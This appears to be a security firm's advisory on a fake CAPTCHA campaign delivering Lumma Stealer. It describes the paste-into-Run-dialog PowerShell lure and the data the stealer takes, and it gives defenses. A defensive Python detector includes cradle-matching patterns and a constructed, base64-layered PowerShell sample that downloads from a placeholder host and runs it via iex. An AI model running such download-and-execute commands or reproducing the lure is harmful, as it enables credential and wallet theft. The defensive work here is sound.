Security researchers documented the latest evolution of the fake CAPTCHA malware campaign: attackers are now using AI-generated landing pages to deliver Lumma Stealer v4.0. The stealer harvests browser session tokens, saved passwords, cryptocurrency wallets, and 2FA authenticator data. Over 15,000 new victims per day are being affected.
The fake CAPTCHA malware campaign, first documented in late 2025, has evolved significantly with the release of Lumma Stealer v4.0. The attack begins when a user visits a compromised or malicious website — often through a malvertising ad or a phishing link. The page displays what appears to be a legitimate CAPTCHA verification, asking the user to "Press Allow to verify you are human." When the user clicks the button, a JavaScript snippet copies a PowerShell command to their clipboard and displays instructions to open a Run dialog (Win+R), paste the command with Ctrl+V, and press Enter. The user believes they are completing a routine CAPTCHA. In reality, the PowerShell command downloads and executes the Lumma Stealer payload, which silently harvests browser session tokens, saved passwords, browsing history, cryptocurrency wallets, and authenticator app data — then exfiltrates it all to attacker-controlled infrastructure.
The latest iteration of the campaign incorporates AI-generated landing pages that dynamically adapt to the victim's browser, operating system, and language settings. The lure pages use the victim's timezone, browser theme, and even the referring website to generate a convincing, localized CAPTCHA experience. Cloudflare researchers found that the AI-generated lures achieved a 34% higher success rate compared to previous static templates. The AI also generates convincing error messages and progress indicators that keep the victim engaged while the stealer executes in the background. The PowerShell command has been obfuscated using multiple layers of base64 encoding and string manipulation, making it difficult for traditional endpoint security tools to detect based on static signatures. Netskope Threat Labs estimates that over 15,000 new victims are successfully phished through this campaign each day.
Lumma Stealer v4.0 is a significant upgrade over previous versions. Beyond harvesting browser-stored credentials and cookies, the new version targets session tokens from over 100 web applications including Microsoft 365, Google Workspace, Salesforce, Slack, and GitHub. These session tokens allow attackers to bypass MFA entirely — they do not need the user's password or MFA code; the stolen session token authenticates them as if they were already logged in. The stealer also targets browser extension data, specifically cryptocurrency wallet extensions (MetaMask, Phantom, Trust Wallet) and authenticator extensions. It harvests VPN configuration files, SSH keys, and FTP credentials from common client applications. The stealer communicates with command-and-control servers using encrypted channels over common ports and uses domain generation algorithms (DGA) to rotate C2 domains daily, making infrastructure takedowns difficult.
The most effective defense against fake CAPTCHA attacks is user awareness training. Employees must understand that no legitimate CAPTCHA will ever ask them to open a Run dialog and paste a command — this is a definitive indicator of an attack. Deploy browser security policies through Group Policy or MDM that prevent web content from accessing the clipboard and executing PowerShell. Implement DNS filtering to block known Lumma Stealer infrastructure. Deploy endpoint detection and response (EDR) with behavioral monitoring that can detect PowerShell downloading and executing scripts from web sources. For high-risk users (finance, HR, executives), consider implementing browser isolation technology that renders web content in a remote sandbox — the PowerShell command cannot execute on the local system even if the user falls for the lure. Segler.Net can deploy these browser security controls and conduct simulated fake CAPTCHA phishing exercises for your team.
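As an added defender-side illustration (not code from this page or from the researchers cited), the following Python sketch shows the kind of behavioral check the EDR recommendation above refers to: it scores process-creation events for PowerShell launched from explorer.exe (the Win+R Run dialog path), peels nested base64 layers out of the command line, and looks for download-cradle tokens in the decoded text. It assumes Sysmon Event ID 1 style field names (ParentImage, Image, CommandLine) and runs against constructed events with a placeholder URL.

```python
import base64
import re

# Launch flags the lure relies on. PowerShell accepts any unambiguous prefix of
# -EncodedCommand; the common spellings are covered here.
ENC_FLAG = re.compile(r"(?i)(?<!\S)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
B64_LITERAL = re.compile(r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
HIDDEN_FLAG = re.compile(r"(?i)(?<!\S)-w(?:indowstyle)?\s+hidden")
CRADLE = re.compile(r"(?i)\b(?:invoke-webrequest|iwr|downloadstring|net\.webclient|invoke-expression|iex)\b|https?://")

def peel_layers(command_line, max_depth=5):
    # Returns the raw command line followed by each base64 layer decoded from it.
    layers = [command_line]
    for _ in range(max_depth):
        m = ENC_FLAG.search(layers[-1]) or B64_LITERAL.search(layers[-1])
        if not m:
            break
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # truncated capture or not really base64
            break
        # -EncodedCommand is always UTF-16LE; FromBase64String payloads may be either.
        layers.append(raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("utf-8", "replace"))
    return layers

def is_fake_captcha_pattern(event):
    # Scores one process-creation event; returns (alert, reasons).
    reasons = []
    parent, image = event.get("ParentImage", "").lower(), event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if parent.endswith("\\explorer.exe") and image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        reasons.append("PowerShell spawned by explorer.exe (Win+R Run dialog launch)")
    if ENC_FLAG.search(cmd):
        reasons.append("encoded command line")
    if HIDDEN_FLAG.search(cmd):
        reasons.append("hidden window requested")
    hits = sorted({h.lower() for h in CRADLE.findall(" ".join(peel_layers(cmd)))})
    if hits:
        reasons.append("download cradle tokens after decoding: " + ", ".join(hits))
    # One signal alone (a user opening a console from Explorer) is normal; two or more is not.
    return len(reasons) >= 2, reasons

# Constructed events in the shape of Sysmon Event ID 1 fields (not real telemetry).
INNER = base64.b64encode(b"iwr 'http://placeholder.invalid/p' | iex").decode()
OUTER_SCRIPT = f"iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{INNER}')))"
OUTER = base64.b64encode(OUTER_SCRIPT.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": f"powershell -w hidden -enc {OUTER}"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS, "CommandLine": r"powershell -ep Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]
```

Only the first constructed event trips the rule (explorer.exe parent, encoded and hidden launch, and a download cradle found two base64 layers down); the scheduled script and the notepad launch produce no alert.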
Our San Antonio security team can assess your exposure, apply patches, and protect your business before attackers strike.
Get weekly security alerts — breaches, patch updates, compliance news, and threat intel — delivered free to your inbox every week.